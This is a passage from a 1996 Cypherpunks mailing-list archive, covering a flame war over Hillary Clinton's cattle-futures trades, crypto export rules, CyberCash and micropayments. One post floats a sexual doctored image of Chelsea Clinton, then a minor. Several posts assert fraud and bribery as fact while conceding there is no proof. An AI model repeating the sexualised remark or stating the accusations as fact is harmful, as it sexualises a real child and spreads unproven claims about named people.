> I must confess that I don't know, largely because its irrelevant, even
> in this case.

If you meant "brokers have to put up the margin, not customers, and
they don't have to charge customers the margin" you were simply flat
out wrong. Margin is a customer responsibility, not a broker
responsibility. I will point out, though, that brokers face liability
if their customers cannot meet their obligations -- which naturally
would make any honest broker suspicious of a customer trading a highly
leveraged position in which a tiny move in the market would wipe out
the customer's entire net worth, thus likely exposing the broker to
substantial risk.

Stop loss orders, incidently, aren't any use if the damage would be
done before any such order could be executed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Thu, 6 Jun 1996 20:55:42 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <199606052043.QAA12656@jekyll.piermont.com>
Message-ID: <9606052133.AA03412@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>I live in New York, not Palo Alto. Guess who I work for. Hint: if I
>want to speak to a futures trader, most days I can walk down the hall.

Well why don't you do that and come back with the results eh? You have to 
actually _talk_ to them for the knowledge to transfer Perry y' know. It dosen't 
osmose into you just because you are frobbing the ethernet on some secretaries 
Mac while some merchant banker is making trades in the next office.


>I don't think you get it.

>Its one thing to put up $1000, make $4000, then put up the $5000 and
>make $10,000 with it, etc. Thats a situation where you are compounding
>your profits -- reinvesting them.

>Its another thing to put up $1000, make $4000, withdraw the $4000, put
>up $1000, make $4500, withdraw the $4500, etc.

You still don't understand, the $1000 is not the stake, it is merely the 
deposit. The stake is Hillary's entire net worth, that is what she is betting 
with.

Its not compound interest on a $1000 stake so $1000+ $4000 profit = $5000
stake, the stake is the $500,000 plus her house would fetch so each time
she takes a $4000 profit her stake barely increases. $500K + 4K is $504K, next 
time she can write a contract for $4040.



>This is not a case of someone making a profit and reinvesting it so
>that she got compound returns. This is a case of someone miraculously
>turning one in a million trades over and over and over again on the
>same tiny stake until she got $100,000.

Rubbish, thats only 25 contracts sold without a loss. Depending on
the market one usually takes a profit when selling a contract. 

These are not "one in a million trades" Perry, they are the sort of trade that 
one would expect to make in an underwritting capacity for a commodity market. 
Steady profits on contracts which generally pay off. 


>I will state this for the record: Having examined the evidence, I
>would say that even a non-expert who was reasonably informed about how
>the futures markets work would have no choice but to conclude that
>Hillary Clinton's trading pattern was impossible without some sort of
>fraud being committed.

So you think that the Republican's in Washington haven't figured out
what Perry Metzger has? 


>> Forgive me if I am wrong but are CFTC margin requirements not 
>> requirements placed on brokers as opposed to requirements brokers
>> must impose on customers?

>I must confess that I don't know, largely because its irrelevant, even
>in this case.

Perry, its the crux of your case, you are claiming that Hilary committed fraud 
but you do not know whether the responsibility for covering the trades is on the 
broker or on the client. You are mouthing off that Hillary was illegally trading 
without putting up margin when you don't know whether or not that is a crime. 


>We are not dealing with some idiot like Spiro T. Agnew here. We are
>talking about a pair of well educated, very smart and totally
>unscrupulous crooks -- Bill and Hillary Clinton. There is no evidence
>that you can pin on them in court.

Perry, before you go off into what you would like to believe consider your last 
sentence. You admit that there is no evidence, you also fail to understand what 
is understand in selling contracts.

As a media meme this one had legs in the same manner as the Borda medals affair. 
There is no reason to believe that Borda was wearing the valour pins in bad 
faith, the rules on the matter were vague. Depending on which version of the 
manual you believe you could say it was right or you could say it was wrong. No 
indication of an act of bad faith. But take a decorated combat vet who is wazzed 
off about being jacked out of the army and the Washington press we know what the 
result would be. Regardless of whether it was or was not an act of bad faith the 
press prefer the bad faith story. 

I don't know any other country which treats it politicians in the same way as 
the US does. I have friends in both parties who have left the Washington 
political scene because they don't think the game is worth the candle. 


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 6 Jun 1996 11:52:20 +0800
To: cypherpunks@toad.com
Subject: URL for NRC Report, html
Message-ID: <199606051735.RAA15372@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Replay Web Development, the URL for NRC Report on "Cryptography's
Role in Securing the Information Society" has been html-ed: 
 
 
     http://pwp.usa.pipeline.com/~jya/nrcindex.htm 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 6 Jun 1996 19:05:34 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorism Hysteria on the Net
In-Reply-To: <199606051227.MAA00334@pipe2.t2.usa.pipeline.com>
Message-ID: <Pine.GUL.3.93.960605173029.13793A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, John Young wrote:

> Today's USA has a pair of front page stories: 
>  
> They lay out the nightmares and the valiant TLA-daydreams to out-fund the
> hackers and out-flummox the public. 
>  
>  
> "You bring me a select group of hackers and within 90 days I'll bring this
> country to its knees, " says Jim Settle, retired director of the FBI's
> computer crime squad. 

He says that as if it were a bad thing...

> "The threat is there, it's very real," says CIA General Counsel Jeffrey
> Smith. "If we have a Unabomber who decides to launch an attack with a PC
> instead of a bomb, (there could be) real damage." 

Actually, he's probably right. If all the cypherpunks, say, turned "bad,"
there'd be no government and no economy, because so many big systems are so
insecure.

Pooh-poohing the potential risk is not a winning proposition. Pointing out
that the government's policies against properly secure systems have created
this house of cards in which we live is. The NRC crypto report helps
legitimize this spin.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 6 Jun 1996 19:02:28 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960606004355.007038a0@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Whois this Bell anyway? Hasn't he been communally kill filed yet??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 18:10:14 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <9606052133.AA03411@Etna.ai.mit.edu>
Message-ID: <199606052149.RAA12809@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> Well why don't you do that and come back with the results eh? You have to 
> actually _talk_ to them for the knowledge to transfer Perry y' know.

I know the results. 99% of them laughed about the whole thing for
weeks. The poster caricature of Hillary Clinton with a crystal ball
and a thought ballon filled with cattle that I saw on one floor was
particularly amusing.

The thing was a universal joke. I never heard anyone who would be
nicer than to say the whole thing was extremely suspicious.

> You still don't understand, the $1000 is not the stake, it is merely
> the deposit. The stake is Hillary's entire net worth, that is what
> she is betting with.

Gee, Mr. Hallam-Baker, it seems your ignorance about what she was
trading (I believe you thought it was "options" before) also extends
to an ignorance about how the futures markets work or how securities
accounts work.

> Rubbish, thats only 25 contracts sold without a loss. Depending on
> the market one usually takes a profit when selling a contract. 

Making that kind of return in day trades in the cattle markets? You
out of your ever living mind?

Its not like there was even any basis for her trades that she could
articulate. Thats because the trades were made without any basis, in
matched pairs.

(By the way, learn what a contract is. A contract is not the same as a
trade. You are sounding thoroughly ridiculous.)

> These are not "one in a million trades" Perry, they are the sort of
> trade that one would expect to make in an underwritting capacity for
> a commodity market.

You ARE out of your ever living mind.

The average individual account holder at Refco "blows out" (that is,
loses their entire stake) within six months of opening their
account. Refco is one of the more reputable places to trade futures.

You are simply an ignoramous, talking totally outside your
league. Have you ever so much as bought a futures contract or an
options contract? Have you even ever opened a securities account?

> >I will state this for the record: Having examined the evidence, I
> >would say that even a non-expert who was reasonably informed about how
> >the futures markets work would have no choice but to conclude that
> >Hillary Clinton's trading pattern was impossible without some sort of
> >fraud being committed.
> 
> So you think that the Republican's in Washington haven't figured out
> what Perry Metzger has? 

Of course they know. There just isn't anything that can be done. There
is no proof. Its more or less as though one finds a man with gunpowder
stains on his hands, and a bullet embedded in the wall of his office
and human blood soaking the carpet. You can't prove that he killed
anyone. You can never get a conviction. But you can know.

Well, it was announced, and the media discussed it, and Hillary gave
her teary eyed press conference cynically wearing a matronly outfit,
and she gave her usual raft of "I cannot recalls" and "I don't
remembers" and given no additional evidence, the whole thing ended.

> Perry, its the crux of your case, you are claiming that Hilary
> committed fraud but you do not know whether the responsibility for
> covering the trades is on the broker or on the client.

The fraud was in the ticket switching, so it makes no difference that
the margin requirements were not made.

The other crime was, of course, bribery. However, without records or
information, there is no way to prove any of it. The mere fact that
all the records from the brokerage were mysteriously destroyed should
make you wonder.

> You are mouthing off that Hillary was illegally trading without
> putting up margin when you don't know whether or not that is a
> crime.
 
Switching the tickets was the fraud. Taking bribes was also a crime. I
have no concern as to whether the margin requirements issue was
criminal -- it was probably only a civil violation. In any case it
makes no difference -- there is more than enough crime here to go
around.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 6 Jun 1996 18:15:40 +0800
To: cypherpunks@toad.com
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <199606050531.WAA27734@netcom7.netcom.com>
Message-ID: <m0L3oD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


frantz@netcom.com (Bill Frantz) writes:

> At  4:45 PM 6/4/96 -0400, Black Unicorn wrote:
> >"Morphing" seems to be the latest buzzword for putting childrens faces on
> >the bodies of adult models in sexually explicit poses and seems to have
> >attracted enough attention to warrant congressional attention.
>
> The ability to use the faces of famous political people (e.g. Bill&Hillery
> or Bob&Libby) in XXXX rated political satire probably has a wider market.

This is a cool idea - I wonder if there's an FTP site with X-rated doctored
pictures of the KKKlintons.  Would a morphed image of Chelsea performing
fellatio on Slick Billy be protected as political satire?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@mit.edu>
Date: Thu, 6 Jun 1996 17:35:18 +0800
To: cypherpunks@toad.com
Subject: National Bank Brings Internet CyberCash To Canada 06/05/96
Message-ID: <9606052238.AA27259@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 5 Jun 1996 17:18:39 -0400
>From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
>To: reagle@rpcp.mit.edu
>Subject: National Bank Brings Internet CyberCash To Canada 06/05/96
>
>
>                                         
>MONTREAL, QUEBEC, CANADA, 1996 JUN 5 (NB) -- The National Bank of  
>Canada, one of Canada's smaller chartered banks, has signed an 
>agreement with CyberCash Inc. (NASDAQ:CYCH) to bring the Reston, 
>Virginia-based company's Internet payment service to Canada. 
>
>CyberCash touts its payment service -- also called CyberCash -- as a  
>secure method of making payments over the Internet using a credit 
>card. 
>
>To use the system, a consumer first downloads software called the  
>CyberCash wallet from CyberCash's site on the World Wide Web 
>(http://www.cybercash.com ) or from a participating merchant's 
>site, said Melissa Walia, a spokeswoman for CyberCash. The free 
>software, installed on the user's PC, allows the customer to make 
>purchases via the Internet and have them charged to a credit card. 
>
>CyberCash supports major credit cards such as Visa, MasterCard,  
>American Express, and Discover, company officials said. Walia told 
>Newsbytes that Canadians who wish to use the service will not have 
>to be customers of the National Bank. The bank will work with 
>participating Canadian merchants to provide the CyberCash service. 
>
>The CyberCash Cash Register is the merchant piece of the  
>CyberCash system. It works on a merchant's server and receives 
>information necessary to process a credit card transaction. The 
>system is designed to work with an existing financial institution 
>infrastructure, officials said. 
>
>CyberCash said it is committed to supporting the Secure Electronic  
>Transaction (SET) standard for Internet credit-card transactions, 
>announced recently by Visa and MasterCard. The company claimed it 
>plans to be one of the first SET-compliant Internet payment services 
>available. 
>
>Neither Walia nor Bridget Limoges, a spokeswoman for the National  
>Bank, would say how many Canadian merchants have signed up to 
>use CyberCash at this point. However, Limoges told Newsbytes that 
>interest in the technology has been strong. 
>
>The CyberCash credit-card payment service, launched in the United  
>States in April, 1995, is expected to be available to Canadians 
>this summer, Limoges said. CyberCash also said it is working on 
>electronic check and coin services, expected to be released in 
>the second half of this year. 
>
>(Grant Buckler/19960605/Press Contact: Melissa Walia, Niehaus  
>Ryan Group for CyberCash, tel 415-615-7911, fax 415-615-7901, 
>Internet e-mail melissa@nrgpr.com; Bridget Limoges, National Bank 
>of Canada, 514-394-6494; Public Contact: CyberCash, Internet 
>e-mail info@cybercash.com) 
>                
>
>
_______________________
Regards,            Real generosity toward the future lies in giving 
                    all to the present. - Albert Camus
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 17:39:36 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: whitehouse web incident, viva la web revolution
In-Reply-To: <9606052321.AA03525@Etna.ai.mit.edu>
Message-ID: <199606052352.TAA12965@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> As you know very well it's Dr.

My apologies. From now on I will refer to you solely as Dr. Phill
Hallam-Baker, PhD.

> and as you also know, signing a futures, options or any other type
> of contract is an open ended risk.

One doesn't "sign a futures" contract. The risk is also not always
open ended by any means. If I purchase 50 unleaded gasoline contracts,
my risk is strictly limited -- I cannot lose more than the value of
the gasoline, and that would only be if it became totally worthless
(an unlikely event). If I sell an uncovered contract, things are
different, of course. With options, if I buy puts or calls, again, my
risk is totally limited -- I cannot lose more than the cost of the
contracts.

> That is how the person purchasing the contract has the theoretcial
> possibility of unlimited reward.

Er, no.

You have potentially unlimited reward in ANY purchase, and limited
risk. If I buy a box of cornflakes and next week cornflakes suddenly
become worth $1,000,000 a box, well, I've experienced reward, but my
risk was at most the cost of the cornflakes.

> >Of course they know. There just isn't anything that can be done. There
> >is no proof. Its more or less as though one finds a man with gunpowder
> >stains on his hands, and a bullet embedded in the wall of his office
> >and human blood soaking the carpet. You can't prove that he killed
> >anyone. You can never get a conviction. But you can know.
> 
> Its called circumstantial evidence and it leads to a conviction provided the 
> name of the defendant isn't O.J. Simpson. 

No, it isn't. If there is no body and no one knows who you have shot,
the rules of Corpus Delecti pretty much dictate that you aren't going
to jail. You cannot be charged with the murder of unknown persons when
there isn't even any evidence of what happened (it could very well
have been someone being accidently injured while you were showing off
your gun collection and they might have done just fine). You don't
even have to say what happened -- you are under no obligation to
testify, you know.

Now, your neighbors will probably talk badly of you forever, but you
won't be convicted of anything.

> It would certainly be enough to arrange congressional hearings, subpoena half
> the Whitehouse staff and demand every document in sight.

What documents can they subpoena? All of Hillary Clintons documents
are available. It is known what she traded and when. Without a witness
who will say who did the bribing, or broker records showing the
counterparty who was doing the bribing, nothing can be done.

You seem to assume that every crime in existance can be
prosecuted. They can't. Hillary Clinton can claim to be the victim of
a very odd set of circumstances, which is effectively what she has
done, and we have no way to put her in jail.

That doesn't mean, however, that we have to believe her.

> Speculating in derivatives is not something I am particularly
> interested in, having seen the losses of some people in this
> building who got caught in the Netscape short squeeze I'm not
> particularly inclined to rush into that market.

Netscape options were not available at the time that the shorts got
hurt. Selling short is not a derivatives investment. You don't seem to
have much of a deep knowledge of these markets -- at the very least
you speak of them in a manner guaranteed to produce derision from
professionals.

> >Switching the tickets was the fraud. Taking bribes was also a crime. 
> 
> Perry, Perry, you are off at it again. You are making allegations you cannot 
> back up.

You are right. The human blood might have been from the blood bank,
and the bullet might have been an accident. Its fucking unlikely,
though.

> You have hypothesised that there were multiple tickets but have no 
> proof,

Correct. That is why Hillary Clinton and Bill Clinton aren't in
jail. However, court proof and proof good enough for me aren't the
same thing.

> All you can point to 
> is that a person with a net worth of several million

They had a considerably smaller net worth at the time.

Most of the Clinton's net worth appears to have come from dirty
political dealings over the years -- things like the Cattle Futures
bribe laundry, Rose Law Firm overbillings or dealings with the
Arkansas state government, etc. Not a shred of it can be proven in
court, of course.

> made a tidy profit speculating in cattle futures with the aid of
> some astute financial advice.

No one out there that I know of who does this for a living has ever
seen anyone make that much money in short term speculation that
way. George Soros, Paul Jones and all the rest would be envious of the
performance she had in the markets.

I don't know anyone who can articulate a theory of why the trades were
made when they were that comes from "astute thinking". They are
seemingly random. Thats probably because they WERE random.

> If you are to make such serious allegations against anyone you should be 
> prepared to back them up with something more than heresay and name
> calling.

As I've said, the evidence is compelling. It just isn't proof. Its
just like the bullet, the blood, and the powder burns on your
hands. No body and no missing person means no jail, but it doesn't
mean that one has to go about thinking what one is looking at is
perfectly innocent.

> Just because it might have been possible to conceal a bribe does not
> mean that you have evidence that a bribe was given.

If this was Richard Nixon no one would be questioning what the money
was.

I see no other explanation for what the money would have been. The
fact that her supposed advisor on these trades was the attorney for
Arkansas's most important company, Tyson Chicken, is a bit on the
suggestive side. Again, it is not proof, but proof isn't needed.

> It is not unusual for lawyers to dabble in speculation. It is also
> not unusual for clever lawyers to have friends who can give good
> advice.

If you can find anyone on earth who can give that good a bunch of
advice, please let me know. Several hedge fund managers I work with
would probably pay me for their name.

I don't know anyone who has EVER performed that well in the
markets. Its nearly impossible.

> Consider that anyone on cypherpunks might have made a tidy profit by
> realising that certain network ventures were likely to realize
> substantial profits for those dealing in the market. It dosen't take
> a genius to look at the rise Sun's stock price

Could you have made 100 to one on that in a couple of months, though?

Sure, its easy to make 20% or 30% on your money a year. Its hard, but
many people do it.

Making 10,000% in a few weeks is impossible.

> Oh come off it Perry, the Washington media do not need proof or even
> evidence to have a feeding fest.

They did for a while, but when it became obvious that the evidence was
not going to lead to the court room, it ended. Besides, most of the
media in Washington are registered Democrats. 89% of the Washington
press corps voted for Clinton from what I've read.

Your attitude seems to be "you can't prove anything so you must assume
that they are innocent." My attitude is "I can't prove anything so
they can't go to jail, but that doesn't mean I have to believe that
they are innocent -- in fact, I'm an idiot if I believe that."

> I think that given Perry's ad-hominem attacks and the fact that this
> has nothing to do with cryptography that its about time someone sent
> Perry a Perry-gram.

Cypherpunks no longer is a cryptography mailing list. Its a sewer.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: szabo@netcom.com (Nick Szabo)
Date: Thu, 6 Jun 1996 17:12:13 +0800
To: cypherpunks@toad.com
Subject: Micropayments: myth?
Message-ID: <199606060257.TAA16018@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Some electronic commerce projects promise dramatically lower transaction
costs, so that we can achieve "micropayments", "microintermediation",
and so forth.  Is this achievable?  

Consider a feature fairly independent of the particular payment system: 
the statement of charges.  Here lies a tradeoff here between completeness 
and complexity.   On the one hand, merely summarizing charges creates 
the opportunity for salami frauds, allowing widely distributed false or 
exaggerated microcharges to go undetected.  Furthermore, parties reading 
only the summaries get no feedback by which they can adjust their behavior
to minimize costs.  On the other hand, a statement too complex to
be easily read also allows fraud, error, and inefficient usage to 
go unrecognized, because one or both parties cannot understand the 
rationale for the charges in relation to the presumed agreement on
terms of service and payment. 

There seems to lie here a fundamental cognitive bottleneck, creating a
limit to the granularity of billable transaction size whether electronic
or physical.  One proposed solution to this has been "intelligent 
agents".  But since these agents are programmed remotely, not by the 
consumer, it is difficult for the consumer to determine whether the agent
is acting the consumers' best interests, or in the best interests
of the counterparty -- perhaps, necessarily, at least as difficult 
as reading the corresponding full statement of charges.   By
sleight of hand we may have merely transformed the language of 
the transaction as it needs to be understood by the party, without
reducing the complexity to be understood.  Furthermore, the user 
interface to enable consumers to simply express their sophisticated 
preferences to an agent is lacking, and may represent another fundamental 
cognitive bottleneck.

Telephone companies have found billing to be a major bottleneck.
By some estimates, up to 50% of the costs of a long distance call
are for billing, and this is on the order of a $100 billion per year
market worldwide.  Internet providers have been moving to a flat fee in 
order to minimize these costs, even though this creates the incentive for 
network resource overusage.  

A micropayments system assumes a solution to the billing problem.
If somebody could actually solve the this problem, rather 
than merely claiming to have solved it via some mysterious
means ("intelligent agents", et. al.), the savings would be 
enormous even in existing businesses such as long distance and
Internet service -- never mind all the new opportunities made
possible by micropayments.  

Nick Szabo
szabo@netcom.com
http://www.best.com/~szabo/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 6 Jun 1996 18:00:01 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff in NYT on NTT/RSA chip
Message-ID: <199606060356.UAA15845@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 6/5/96 -0000, nelson@crynwr.com wrote:
>David Lesher writes:
>
> > So Motorboatarola puts chips in the domestic MTSO's. 
> > For the international ones, they leave the chips out.
>
>Crypto hooks, or more properly, crypto pads. 

This raises a question:  If you provide a place for a crypto chip but don't 
install it, shouldn't you be able to export it?  But the software analogy, 
crypto hooks, the government is trying to restrict them.  This is why I 
think the latter interpretation is flawed:  Historically, the mere fact that 
a system can interface to another one that can do crypto can't be used to 
restrict it.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Thu, 6 Jun 1996 14:56:30 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff in NYT on NTT/RSA chip
In-Reply-To: <v03007101adda1bc74f88@[206.151.234.118]>
Message-ID: <19960605213317.4796.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher writes:

 > So Motorboatarola puts chips in the domestic MTSO's. 
 > For the international ones, they leave the chips out.

Crypto hooks, or more properly, crypto pads.  Lends new meaning to the
term "one time pads".

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syl Miniter <MINITERS@citadel.edu>
Date: Thu, 6 Jun 1996 16:33:49 +0800
To: cypherpunks@toad.com
Subject: is the list active??
Message-ID: <01I5KBX5OHII00030A@CITCS.Citadel.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently re-subscribed --several days ago and have not received any
traffic???
I am wondering if the list is still active as I checked and I am subscribednso
I am sending this note to this list to test if anyone is out there




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Thu, 6 Jun 1996 19:40:18 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960606045507.006d9b24@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:43 PM 6/5/96 -0400, Duncan Frissell wrote:

>Yeah and they busted Jack London for publishing "The Assassination Bureau,
Ltd".

Do I really have to point out that London was writing the better part of a
century ago, in a substantially different legal and cultural environment?
(Heck, his socialism made more trouble for him than anything else.)

>Advocating the general practice of killing one's opponents is as legal as
>church on a Sunday.  The War College (or is it the NDU these days) does it
>all the time.

And they, of course, are The Government, who Protect Us from the Evil
Terrorists. Ditto for the heroic BATF agents who only burn bad nasty
terrorists, honest. And all the rest.

The rest of us (in the US) live in a country where the government can now
pretty much declare anyone they like terrorists, and suspend habeus corpus
on the flimsiest of grounds, and use evidence against foreigners that
doesn't have to be presented to the accused, and all sorts of fun stuff.

Hence my concern.

I don't think that my direst claims _will_ come true. But I don't think I'm
speculating anything that _can't_ happen, and I see much of it as
increasingly likely in the light of the ongoing furor over crypto and
related matters.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 6 Jun 1996 17:11:46 +0800
To: John Young <jya@pipeline.com>
Subject: Re: USA on Feds Cyberteam
In-Reply-To: <199606051318.NAA03600@pipe2.t2.usa.pipeline.com>
Message-ID: <Pine.SV4.3.91.960605221206.22400H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Guess this puts that Carnagie Mellon-based outfit ("Computer Emergency 
Response Team"?) off the govt contract teat.

Or maybe they will continue to doa all the trenchwork under contract, but 
people high up enough in the DC feeding chain to have their own PR 
appendage, will take the credit?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Thu, 6 Jun 1996 21:42:49 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse web incident, viva la web revolution
Message-ID: <2.2.32.19960606051847.006e9b18@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 6/5/96 -0400, Hallam-Baker wrote:

>rather than reasoned argument. His dislike for the Clinton is 
>well known - he recently accused the administration of being
>fascist. I know of no evidence that the Clinton administration
>has a genocide policy, it is an insult to the 10 million civilians
>murdered by Hitler to use the term facist simply as a term of abuse,
>especialy if it is being used as a substitute for an argument.

Fascism has no intrinsic link to genocide. It is a theory of economics,
basically, in which the state has ultimate authority over production and
distribution without (as in socialism) actually _owning_ the means of
production or distribution. This is generally accomplished through
cartelization, the creatin of industry-wide councils in which the
representatives of the most powerful firms set policy in conjunction with
the representatives of the government.

The US has been at least moderately fascist since the 1920s (Hoover was a
big fan of cartelization, and pushed it actively). While the mechanisms of
the modern regulatory state aren't those of classic fascist theory, in
practice most strongly regulated industries in this country operate
_exactly_ the way fascist theory says they should.

And various of Clinton's policies have, in fact, been fascist in this sense.
The man has no doctrinal commitment to fascism (under that name or any
other), but in practical terms virtually all modern Western politics are
either fascist or socialist.

None of this is secret lore, by the way.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Thu, 6 Jun 1996 19:41:32 +0800
To: cypherpunks@toad.com
Subject: Zimmerman/ViaCrypt?
Message-ID: <2.2.32.19960606052017.006e7d90@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Has there been any news recently about what's going on with commercial
versions of PGP? I've been toying with the idea of buying the Windows
version from ViaCrypt just to have a PGP that doesn't need to shell out to
DOS each time it runs, but I'm curious as to where, if anywhere, things seem
to be going.

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rodger@interramp.com (Will Rodger)
Date: Thu, 6 Jun 1996 17:08:49 +0800
To: nelson@crynwr.com
Subject: Re: Markoff in NYT on NTT/RSA chip
Message-ID: <v01510101addbb8dd94cd@[38.12.4.241]>
MIME-Version: 1.0
Content-Type: text/plain


>David Lesher writes:
>
> > So Motorboatarola puts chips in the domestic MTSO's.
> > For the international ones, they leave the chips out.
>
and Russ Nelson responded:
>Crypto hooks, or more properly, crypto pads.  Lends new meaning to the
>term "one time pads".
>

For what it's worth, Motorola can do neither. US companies can't produce
anything prohibited for export unless its in the US, for the US market. And
"crypto with a hole," or hooks for crypto generally, can't be exported,
either, unless for 40-bit stuff only. Thus, Microsoft's proposals to
produce "crypto with a hole" depend on "holes" tailored to the requirements
of specific countries.

Will Rodger
Washington Bureau Chief
Interactive Week






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 6 Jun 1996 16:34:00 +0800
To: Bruce Baugh <cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <2.2.32.19960606024345.00a07918@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:41 PM 6/4/96 -0700, Bruce Baugh wrote:
>I think there's a non-trivial chance that this list could be shut down and
>anyone who's made interested sounds in the idea brought in to assist the
>police in their inquiries.

Yeah and they busted Jack London for publishing "The Assassination Bureau, Ltd".
(http://www.amazon.com/exec/obidos/ISBN=0140186778/1663-9102790-622063)

Advocating the general practice of killing one's opponents is as legal as
church on a Sunday.  The War College (or is it the NDU these days) does it
all the time.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 6 Jun 1996 16:45:39 +0800
To: jya@pipeline.com (John Young)
Subject: Re: USA on Feds Cyberteam
Message-ID: <199606060340.XAA24064@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  5 Jun 96 at 13:18, John Young wrote:

>    USA Today, June 5, 1996, p. 1. 
[..]
>    To see adjoining UT article (9 kb),  
>     
>    "Post-Cold War hysteria or a national threat?" 
>  
>       http://pwp.usa.pipeline.com/~jya/hysteria.txt 

There's so many fnords my eyes hurt to read it.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Thu, 6 Jun 1996 21:01:47 +0800
To: cypherpunks@toad.com
Subject: Phill in Zychik Chronicle
In-Reply-To: <Pine.SUN.3.91.960605162420.7279B-100000@polaris>
Message-ID: <Pine.HPP.3.93.960605232630.21102A-100000@buzzard.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain




Zychik Chronicle is a free  electonic publication, it's recommended
by my Libritarian/Chryto-Anarchal Capiltalist friends.


---fowarded message

---------------World Trade & Liberty:

(CyberWire Dispatch June 3rd, brock@well.com for a free subscription) 
Brook Meeks the author of CyberWire calls it a "virtual nuke hurled into
